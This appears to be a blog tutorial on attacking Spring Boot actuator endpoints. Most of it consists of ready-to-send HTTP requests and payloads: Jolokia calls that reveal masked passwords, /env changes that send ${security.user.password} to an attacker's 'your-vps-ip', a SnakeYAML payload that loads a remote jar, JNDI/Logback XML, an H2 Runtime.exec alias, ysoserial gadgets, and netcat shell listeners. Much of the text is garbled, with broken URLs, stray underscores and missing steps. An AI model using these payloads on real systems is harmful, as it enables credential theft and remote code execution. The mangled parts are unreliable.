Introduction to Spring Boot Related Vulnerabilities

Routing Knowledge

  • The root path of the default built-in routing in Spring Boot 1. x version /starts, and in 2. x, it /actuator starts with.
  • Some programmers will customize /manage, /managementor the project -related name is the root path
  • The default built-in route name, such as /envSometimes it will be modified by the programmer, such as modified to/appenv

Version Knowledge

Spring Cloud builds services based on Spring Boot and provides an ordered collection of frameworks that help to rapidly develop distributed systems with common functions such as configuration management, service registration and discovery, and intelligent routing.

Version Interdependencies of Common Components:

dependenciesVersion list and dependent component versionsspring-boot-starter-parentspring-boot-starter-parentspring-boot-dependenciesspring-boot-dependenciesspring-cloud-dependenciesspring-cloud-dependencies

Information Leakage

Leakage of routing address and interface call details

  • When the development environment was switched to the online production environment, the relevant personnel did not change the configuration file or forgot to switch the configuration environment, resulting in this vulnerability

Route Exposed by Improper Configuration

  • Mainly because programmers did not realize that exposing routing may cause security risks when developing, or did not develop in accordance with standard procedures, and forgot to modify/switch the configuration of the production environment when going online

/env,/actuator/env

  • GET requests /env will leak environment variable information or some usernames in the configuration. When the programmer’s attribute names are not standardized (for example, the password is written as passwords, PWD), the plaintext of the password will be leaked.
  • At the same time, there is a certain probability that some attributes can be set through the POST request /env interface to trigger related RCE vulnerabilities.

/Jolokia

  • Find exploitable MBeans through the /jolokia/list interface to trigger related RCE vulnerabilities;

/trace

  • Some http request packets access tracking information, it is possible to find valid cookie information

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 1)

  • When accessing the /env interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization
  • The target uses Jolokia-core dependencies (version requirements are currently unknown)
POST /jolokiaContent-Type: application/json{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
POST /actuator/jolokiaContent-Type: application/json{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
  • In fact, it calls the getProperty method of the org.springframework.cloud.context.environment.EnvironmentManager class instance
POST /jolokiaContent-Type: application/json{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
POST /actuator/jolokiaContent-Type: application/json{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 2)

When accessing the /env interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization

  • can POST requests to the target website/env
  • You can POST request the /refreshinterface refresh the configuration ( spring-boot-starter-actuatordependency exists)
  • The target uses a spring-cloud-starter-netflix-eureka-clientdependency.
  • The target can request the attacker’s server (the request can go out of the Internet)
nc -lvk 80
POST /env
Content-Type: application/x-www-form-urlencoded
eureka .client .serviceUrl .defaultZone =http: //value:${security.user.password}@your-vps-ip
POST /actuator/env
Content- Type : application/json
{ "name" : "eureka.client.serviceUrl.defaultZone" , "value" : " http :// value : ${security.user.password} @your-vps-ip" }
POST /refresh
Content - Type : application/x- www- form - urlencoded
POST /actuator/ refresh
Content- Type: application/json
Authorization: Basic dmFsdWU6MTIzNDU2

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 3)

When accessing the /env interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization

  • The target can request the attacker’s server (the request can go out of the Internet)
nc -lvk 80
POST /env 
Content-Type: application/x-www-form-urlencoded eureka .client .serviceUrl .defaultZone =http: //your-vps-ip/${security.user.password}
POST /actuator/envContent-Type: application/json{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"}
POST /env
Content-Type: application/x-www-form-urlencodedeureka .client .serviceUrl .defaultZone =http: //your-vps-ip/${security.user.password}
POST /actuator/envContent-Type: application/json{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"}
POST /refresh
Content - Type : application/x- www- form - urlencoded
POST /actuator/ refresh
Content- Type: application/json

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 4)

  • When accessing the /env interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization
  • GET Request the target’s /heapdumpor /actuator/heapdumpinterface to download the application’s real-time JVM heap information

Remote Code Execution

Since spring boot related vulnerabilities may be caused by the combination of multiple component vulnerabilities, some vulnerabilities are not named properly, whichever can be distinguished

White Label Error Page SpEL RCE

Conditions of use:

# coding: utf-8

result = ""
target = 'open -a Calculator'
for x in target:
result += hex(ord(x)) + ","
print(result.rstrip( ',' ))
  • At this point, the parameter value in the URL will be recursively parsed with the parseStringValuemethod
  • ${} The content enclosed in it will be parsed and executed by org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfigurationthe resolvePlaceholdermethod as a SpEL expression, resulting in an RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9091/article?id=66 _

Spring Cloud SnakeYAML RCE

Conditions of use:

  • You can POST request the /refreshinterface refresh the configuration ( spring-boot-starter-actuatordependency exists)
  • spring-cloud-starter version of target dependency < 1.3.0.RELEASE
  • The target can request the attacker’s HTTP server (the request can go out of the Internet)
# Use python to quickly start the http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
!! javax.script.ScriptEngineManager [
!! java.net.URLClassLoader [[
!! java.net.URL [ " http : //your-vps-ip/example.jar " ] _ _ _ _ _ _
]]
]
POST /env
Content - Type : application/x- www- form - urlencoded
spring.cloud.bootstrap.location =http : //your-vps-ip/example.yml
POST /actuator/ env 
Content- Type: application/json
{ "name" : "spring.cloud.bootstrap.location" , " value" : " http : //your-vps-ip/example.yml"}
POST /refresh
Content - Type : application/x- www- form - urlencoded
POST /actuator/ refresh
Content- Type: application/json

Vulnerability Principle:

  • The spring.cloud.bootstrap.location property is set to the URL address of the external malicious yml file
  • refresh triggers the target machine to request the yml file on the remote HTTP server and get its content
  • SnakeYAML has a deserialization vulnerability, so it will complete the specified action when parsing malicious yml content
  • First, trigger java.net.URL to pull the malicious jar file on the remote HTTP server
  • Then look for the class in the jar file that implements the javax.script.ScriptEngineFactory interface and instantiate it
  • Execute malicious code when instantiating a class, causing RCE vulnerability
http://127.0.0.1:9092/env _

Eureka XStream Deserialization RCE

Conditions of use:

  • You can POST requests to the /envinterface set properties
  • You can POST request the /refreshinterface refresh the configuration ( spring-boot-starter-actuatordependency exists)
  • eureka-client< spring-cloud-starter-Netflix-eureka-client1.8.7 used by the target (usually included in dependencies)
  • The target can request the attacker’s HTTP server (the request can go out of the Internet)
  • Use python to run the above script on the server you control, and modify the ip address and port number of the rebound shell in the script according to the actual situation.
nc -lvp 443
POST /env
Content-Type: application/x-www-form-urlencoded
eureka .client .serviceUrl .defaultZone =http: //your-vps-ip/example
POST /actuator/ env 
Content- Type: application/json
{ "name" : "eureka.client.serviceUrl.defaultZone" , "value" : " http :// your - vps - ip / example " }
POST /refresh
Content - Type : application/x- www- form - urlencoded
POST /actuator/ refresh
Content- Type: application/json

Vulnerability Principle:

  • The eureka.client.serviceUrl.defaultZone property is set to the malicious external eureka server URL address
  • refresh triggers the target machine to request a remote URL, and the fake eureka server set up in advance will return a malicious payload
  • The target machine is dependent on parsing the payload, triggering XStream deserialization, resulting in RCE vulnerability
http://127.0.0.1:9093/env _

Jolokia Logback JNDI RCE

Conditions of use:

  • The target uses jolokia-core dependencies (version requirements are currently unknown) and related MBeans exist in the environment
  • The target can request the attacker’s HTTP server (the request can go out of the Internet)
  • JNDI injection is affected by the target JDK version, JDK < 6u201/7u191/8u182/11.0.1 (LDAP method)
# Use python to quickly start the http server python2 -m SimpleHTTPServer 80 
python3 -m http.server 80
< configuration >
< insertFromJNDI env-entry-name = "ldap://your-vps-ip:1389/JNDIObject" as = "appName" />
</ configuration >
javac - source 1.5 -target 1.5 JNDIObject.java
nc -lv 443

Vulnerability Principle:

  • Directly accessing the URL that can trigger the vulnerability is equivalent to calling the method of the ch.qos.logback.classic.jmx.JMXConfiguratorclass through jolokiareloadByURL
  • The target machine requests the URL address of the external log configuration file to obtain the content of the malicious xml file.
  • The target machine uses saxParser.parse to parse the xml file (this leads to the xxe vulnerability)
  • The external JNDI server address is set using the dependent tag in the logbackxml fileinsertFormJNDI
  • The target machine requests a malicious JNDI server, resulting in JNDI injection and RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9094/env _

Jolokia Realm JNDI RCE

Conditions of use:

  • The target uses jolokia-coredependencies (version requirements are currently unknown) and related MBeans exist in the environment
  • The target can request the attacker’s server (the request can go out of the Internet)
  • JNDI injection is affected by the target JDK version, jdk < 6u141/7u131/8u121 (RMI way)
# Use python to quickly start the http server python2 -m SimpleHTTPServer 80 
python3 -m http.server 80
nc -lvp 443

Vulnerability principle:

  • Use jolokia to call createJNDIRealm to create JNDIRealm
  • Set the connectionURL address to RMI Service URL
  • Set context factory to RegistryContextFactory
  • Stop Realm
  • Start Realm to trigger JNDI injection of specified RMI address, causing RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9094/env _

h2 Database Query RCE

Conditions of use:

  • You can restart the application by POST requesting the /restartinterface (there is a spring-boot-starter-actuator dependency)
  • Existing com.h2database.h2dependencies (version requirements are currently unknown)
POST /envContent-Type: application/x-www-form-urlencodedspring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');
POST /actuator/envContent-Type: application/json{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}

spring 1.x

POST /restart
Content-Type: application/x-www-form-urlencoded
POST /actuator/restart
Content-Type: application/json

Vulnerability Principle:

  • The spring.datasource.hikari.connection-test-query property is set to a malicious SQL statement that CREATE ALIAScreates a custom function
  • Its properties correspond to the connectionTestQuery configuration of the HikariCP database connection pool and define the SQL statement to be executed before a new database connection
  • restart restarts the application, a new database connection will be established
  • If the custom function in the SQL statement has not been executed, the custom function will be executed, resulting in RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9096/actuator/env _ _ _ _ _ _ _ _

h2 Database Console JNDI RCE

Conditions of use:

  • Enable h2 console in spring configuration spring.h2.console.enabled=true
  • The target can request the attacker’s server (the request can go out of the Internet)
  • JNDI injection is affected by the target JDK version, jdk < 6u201/7u191/8u182/11.0.1 (LDAP method)
javac - source 1.5 -target 1.5 JNDIObject.java
# Use python to quickly start the http server python2 -m SimpleHTTPServer 80 
python3 -m http.server 80
nc -lv 443

Vulnerability Analysis:

http://127.0.0.1:9096/h2-console _

MySQL Jdbc Deserialization RCE

Conditions of use:

  • You can POST request the /refreshinterface refresh the configuration ( spring-boot-starter-actuatordependency exists)
  • A MySQL-connector-javadependency
  • The target can request the attacker’s server (the request can go out of the Internet)
  • Search and observe whether there are common deserialization gadget dependencies in environment variables, such as commons-collections, Jdk7u21, Jdk8u20etc.;
  • Search for the spring.datasource.urlkeyword and record its value value to facilitate subsequent recovery of its normal JDBC url value.
java -jar ysoserial.jar CommonsCollections3 calc > payload.ser
POST /env
Content-Type: application/x-www-form-urlencoded
spring.datasource.url=corresponding property value
POST  /refreshContent-Type: application/x-www-form-urlencoded
POST /actuator/refresh
Content-Type: application/json

Vulnerability principle:

  • The spring.datasource.url property is set to the external malicious MySQL JDBC URL address
  • refresh sets a new spring.datasource.url property value after refresh
  • When the website performs database queries and other operations, it will try to establish a new database connection using the malicious mysql jdbc url
  • The malicious MySQL server will then return the deserialized payload data at the appropriate stage of establishing the connection
  • The target-dependent MySQL-connector-java will deserialize the set gadget, resulting in an RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9097/actuator/env _ _ _ _ _ _ _ _
http://127.0.0.1:9097/product/list _ _ _ _ _ _ _ _

--

--

Our mission is to get you into information security. We'll introduce you to penetration testing and Red Teaming. We cover network testing, Active Directory.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store